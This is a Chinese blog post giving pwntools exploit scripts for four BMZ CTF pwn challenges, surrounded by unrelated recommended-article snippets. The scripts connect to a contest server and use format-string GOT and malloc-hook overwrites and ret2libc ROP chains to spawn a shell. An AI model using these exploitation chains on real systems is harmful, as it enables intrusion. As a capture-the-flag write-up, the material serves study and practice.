BMZ公开赛PWN题

最新推荐文章于 2023-10-14 21:08:01 发布
最新推荐文章于 2023-10-14 21:08:01 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36495104/article/details/111874544
版权

pwn1

exp

#coding=utf-8
from pwn import *
context.log_level="info"
binary="./pwn1"
elf=ELF(binary)
#sh=process(binary)
sh=remote("47.242.59.61",10000)
vuln=0x80486AE

memset_got=elf.got['memset']
sh.recvuntil("e to BMZCTF \n")
payload=fmtstr_payload(10,{memset_got:vuln})
sh.sendline(payload)
sh.interactive()

pwn2

exp

#coding=utf-8
from pwn import *
context.log_level="debug"
binary="./pwn2"
elf=ELF(binary)
# sh=process(binary)
sh=remote("47.242.59.61",10001)

check=0x040073C
pop_rdi=0x0000000000400833
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
sh.recvuntil("e you?\n")
# gdb.attach(sh,"b*0x40076C ")
padding="21232F297A57A5A743894A0E4A801FC3\x00"+'a'*23
payload=padding+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(check)
sh.sendline(payload)
puts_addr=u64(sh.recv(6).ljust(8,"\x00"))
libc_base=puts_addr-0x06f6a0
system_addr=libc_base+0x0453a0
bin_sh_addr=libc_base+0x18ce17

payload=padding+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)+p64(check)
sh.sendline(payload)
sh.interactive()

pwn3

exp

#coding=utf-8
from pwn import *
context.log_level="debug"
binary="./pwn3"
elf=ELF(binary)
# sh=process(binary)
sh=remote("47.242.59.61",10002)

pop_rdi=0x00040155b
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
main=0x04013FA 
sh.sendlineafter(">","smsg")
for i in range(70):
	sh.sendlineafter("`->","aaaa")
	sh.sendlineafter("Send?(Y/N)","N")
# gdb.attach(sh,"b*0x4012DE")
payload='a'*17+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main)
sh.sendlineafter("`->",payload)
sh.sendlineafter("Send?(Y/N)","Y")
sh.recvuntil("Sent.\n")
puts_addr=u64(sh.recv(6).ljust(8,"\x00"))
print "puts"+hex(puts_addr)
libc_base=puts_addr-0x06f6a0
system_addr=libc_base+0x0453a0
bin_sh_addr=libc_base+0x18ce17


sh.sendlineafter(">","smsg")
for i in range(70):
	sh.sendlineafter("`->","aaaa")
	sh.sendlineafter("Send?(Y/N)","N")
# gdb.attach(sh,"b*0x4012DE")
payload='a'*17+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)+p64(main)
sh.sendlineafter("`->",payload)
sh.sendlineafter("Send?(Y/N)","Y")

sh.interactive()

pwn4

exp

#coding=utf-8
from pwn import *
context.log_level="info"

binary="./pwn4"
elf=ELF(binary)
# sh=process(binary)
libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so")
sh=remote("47.242.59.61",10003)

def modif(addr,target):
	one_1=int(hex(target)[-4:],16)
	one_2=int(hex(target)[-8:-4],16)
	one_3=int(hex(target)[-12:-8],16)
	change(addr,one_1)
	change(addr+2,one_2)
	change(addr+4,one_3)

def change(addr,target):
	sh.sendafter(" name: ",p64(addr))
	payload="%"+str(target)+"c%12$hn"
	payload+=(32-len(payload))*'a'
	sh.sendafter("e a msg: ",payload)

stack_chk_fail=elf.got['__stack_chk_fail']

sh.sendafter(" name: ",p64(stack_chk_fail))
payload="%17$ p%2420c%12$hn%2422222440c%1"
sh.sendafter("e a msg: ",payload)

#leak libc
libc_start_main=int(sh.recv(15),16)-240
print "libc_start_main:"+hex(libc_start_main)

libc_base=libc_start_main-0x020750
print "libc_base:"+hex(libc_base)
one=[0x45226,0x4527a,0xf0364,0xf1207]
one_gadget=libc_base+one[1]

realloc_hook=libc_base+libc.sym['__realloc_hook']
malloc_hook=libc_base+libc.sym['__malloc_hook']
realloc=libc_base+libc.sym['realloc']
malloc=libc_base+libc.sym['malloc']
exit_got=elf.got['exit']

print "malloc:"+hex(malloc)
modif(realloc_hook,one_gadget) #
modif(malloc_hook,realloc+0xc)
modif(exit_got,malloc)

#exploit 
# gdb.attach(sh,"b *0x400957")
sh.sendafter(" name: ","fkbugs")
sh.sendafter("e a msg: ","%p")

sh.interactive()
0xCCCC9090
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
ftpm_161_bmz.zip
05-07
ftpm_161_bmz.zip
pwn的五道基础
lllwky的博客
03-27 6640
文章目录一:ret2text1:服务器地址与端口号2:传入参数3:参数的接收范围4:找到bin/sh所在的地址二:your_nc三:overflow四:printf1:找到如何进入/bin/sh2:找到sth的地址3:获得格式化字符串的偏移量五:rop拓展: 一:ret2text from pwn import * context.arch="amd64" io=remote("101.34.90.86",10002) secure_addr=0x400852 payload=b"a"*0x10+b"a"*
CTFmisc图像(zsteg取zip、压缩包重组、IDAT数据隐写、Markdown编写LaTeX、零宽字节隐写)
Hardworking666的博客
01-02 9779
文章目录一、目描述二、目分析与完成zsteg取zip压缩包重组IDAT数据隐写Markdown编写LaTeX二维码Version零宽字节隐写 一、目描述 BMZCTF第二届网络安全公开赛,主办单位:白帽子社区 · WHT战队,2022年1月1日,白帽杯 misc 目名称:游戏秘籍 目说明:做为程序员我的,竟然无法调出30条命,我用笔记记录下来了。 游戏秘籍hint:压缩包注意标识,再重组。 游戏秘籍hint2:笔记是用mardown记录的。 下载一张名为30.png的魂斗罗图片: 二、目分..
BMZCTF union 详解
u013797594的博客
07-19 1018
BMZCTF union 详解 目: 打开目是这样的一个登录框: 解思路: 首先还是做下信息收集,dirsearch跑一跑发现一些文件,但是都没有权限访问: 1.文件包含漏洞 观察一下访问的url,file=xxx可能存在文件包含漏洞,网页源码上也有提示,但是按照网页源码的去访问还是转到login页面。看到文件包含漏洞不要慌,先上咱们的lfi字典生成器爆破一波~。 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传 工具地址:https://github.com/87306052
BMZCTF 山东省大学生网络技术大赛-baby
qq_26243045的博客
12-03 735
下载附件,是一个脚本文件: ``` # -*- coding: utf-8 -*- from Crypto.PublicKey import RSA import libnum import uuid flag = "flag{***************}" rsa = RSA.generate(4096,e=3) p = rsa.p d = rsa.d e = rsa.e N = rsa.n m = libnum.s2n(flag) c = pow(m, e, N..
[BMZCTF-pwn] 22-pwn1
weixin_52640415的博客
02-16 155
昨天整了第一届BMZCTFpwn,都来得及写。这一届一共五个pwn,难度逐个增加。 第一个是个32位no pie,got表可写。程序很短,直接调用无格式参数的printf,而且有循环,got表还有system项。基本属于无障碍型。 int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { char s[100]; // [esp+18h] [ebp-70h] BYREF unsigned i
mz80b_de0:Altera DE0 板的 MZ-80BMZ-2000 系列实现
06-29
FPGA 上的 MZ-80B这是什么? 这是夏普 MZ-80B/MZ-2000 系列到 FPGA 的实现。要求Altera(Terasic) DE0 板Quartus II(我使用 13.1.4,64 位) SD、SDHC 或 MMC 卡如何再现项目下载文件。 创建文件夹以在您的 PC 中...
zencart图片管理插件(Image_Handler4_v4_2插件)
06-21
《ZenCart图片管理插件——Image_Handler4_v4_2深度解析》 ZenCart作为一款开源的电子商务解决方案,为商家提供了强大的在线商店管理功能。在众多的插件中,Image_Handler4_v4_2插件以其高效、便捷的图片管理特性,...
HTML5对手机页面长按会粘贴复制禁用的解决方法
12-13
解决方法如下所示: 直接在CSS 文件中添加下面的代码,就可以实现了在手机端禁止粘贴复制的功能: ... *{ -webkit-touch-callout:none; /*系统默认菜单被禁用*/ -webkit-user-select:none; /*webkit浏览器*/ ...
PWN测试
07-18
信息安全PWN测试目:用于CTF的练习与PWN的学习,测试目。
软件工程期末考试复习总结知识点+必考型.pdf
08-27
软件工程期末考试复习总结知识点+必考型,可以看看是否需要.
pwn学习总结(三) —— 栈溢出经典型整理
qq_41988448的博客
11-19 2620
pwn学习总结(五) —— 经典目整理一1. 栈溢出入门2. 字符串截取+缓冲区执行3. GOT泄露4. libc泄露5. 使用DynELF实现远程libc泄露 1. 栈溢出入门 平台:jarvisoj 目:level0 靶机:nc pwn2.jarvisoj.com 9881 查看程序防护: 查看反汇编: exp: from pwn import * import pwn r = ...
南京邮电大学CTF-PWN-Stack Overflow
Ceciiiilia的博客
04-13 527
终于开始学pwn了…今天第一次做出来这,记录一下。 1、首先放到ida里查看函数情况,发现了fgets()函数 2、双击A追踪,发现A的大小为0x28(0x0804A0A8 - 0x0804A080),并且栈位置的的高位处就是n,所以可以填充0x28个'A',来溢出到n的位置。 3、 from pwn import * #p = process('./cgpwna')#...
ctf中pwn目总结
weixin_41038905的博客
11-16 4681
1.安装 pip install pwntools (python2) pip3 install pwntools (python3) 2.使用 Context设置 context是pwntools用来设置环境的功能。在很多时候,由于二进制文件的情况不同,我们可能需要进行一些环境设置才能够正常运行exp,比如有一些需要进行汇编,但是32的汇编和64的汇编不同,如果不设置context会导致一些问。一般来说我们设置context只需要简单的一句话: context(os='linux', arch='amd
MoeCTF 2023 PWN
最新发布
Xzzzz911的博客
10-14 610
MoeCTF 是西安电子科技大学一年一度的信息安全新生夺旗赛, 由西电信息安全协会 (XDSEC) 面向全体准大学生举办。完结撒花!!!
BMZCTF (持续更新)
zip471642048的博客
04-24 385
文章目录真正的CTFer 真正的CTFer 调整高度可以得到完整的图像大小
BMZCTF misc1
qq_61768489的博客
04-02 1952
真正的CTFer 010修改图片高度,steg查看更清晰 解不开的秘密 word加密 文件给了16密文 ,转ASCII后继续转base64, 得到数据 [HKEY_CURRENT_USER\Software\RealVNC\VNCViewer4\MRU] "00"="127.0.0.1" "Order"=hex:00,01 "01"="127.0.0.1:5900" [HKEY_CURRENT_USER\Software\RealVNC\WinVNC4] "Password"=hex:
利用最小二乘法进行陀螺标定9个误差参数的matlab代码
05-13
以下是一个简单的利用最小二乘法进行陀螺标定9个误差参数的MATLAB代码: ```matlab % 标定数据 data = [wx, wy, wz, mx, my, mz, ax, ay, az]; % 定义误差函数 function e = errorFunc(x, data) wx = data(:,1); wy = data(:,2); wz = data(:,3); mx = data(:,4); my = data(:,5); mz = data(:,6); ax = data(:,7); ay = data(:,8); az = data(:,9); bwx = x(1); bwy = x(2); bwz = x(3); bmx = x(4); bmy = x(5); bmz = x(6); bax = x(7); bay = x(8); baz = x(9); e1 = wx - bwx - bmx.*my + bmy.*mx - bmz.*ax + baz.*ay; e2 = wy - bwy - bmx.*mx - bmy.*my + bmz.*ay + bay.*ax; e3 = wz - bwz + bmx.*ax - bmy.*ay - bmz.*az + bax.*my - bay.*mx; e4 = mx - (1 + bmx).*mx + bmy.*mz - bmz.*my; e5 = my - (1 + bmy).*my + bmx.*mz - bmz.*mx; e6 = mz - (1 + bmz).*mz + bmx.*my - bmy.*mx; e7 = ax - (1 + bax).*ax; e8 = ay - (1 + bay).*ay; e9 = az - (1 + baz).*az; e = [e1; e2; e3; e4; e5; e6; e7; e8; e9]; end % 初始估计值 x0 = zeros(9,1); % 最小二乘法求解误差参数 x = lsqnonlin(@errorFunc,x0,[],[],[],data); % 输出结果 disp('bias_wx: '); disp(x(1)); disp('bias_wy: '); disp(x(2)); disp('bias_wz: '); disp(x(3)); disp('bias_mx: '); disp(x(4)); disp('bias_my: '); disp(x(5)); disp('bias_mz: '); disp(x(6)); disp('bias_ax: '); disp(x(7)); disp('bias_ay: '); disp(x(8)); disp('bias_az: '); disp(x(9)); ``` 其中,`data`是标定数据矩阵,包含了9个列分别对应角速度和磁场、加速度的三个分量。`errorFunc`是定义的误差函数,其中参数`x`是9个误差参数,`data`是标定数据矩阵。`lsqnonlin`函数是MATLAB自带的最小二乘法求解函数,用于求解误差参数`x`,最后输出9个误差参数的值。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值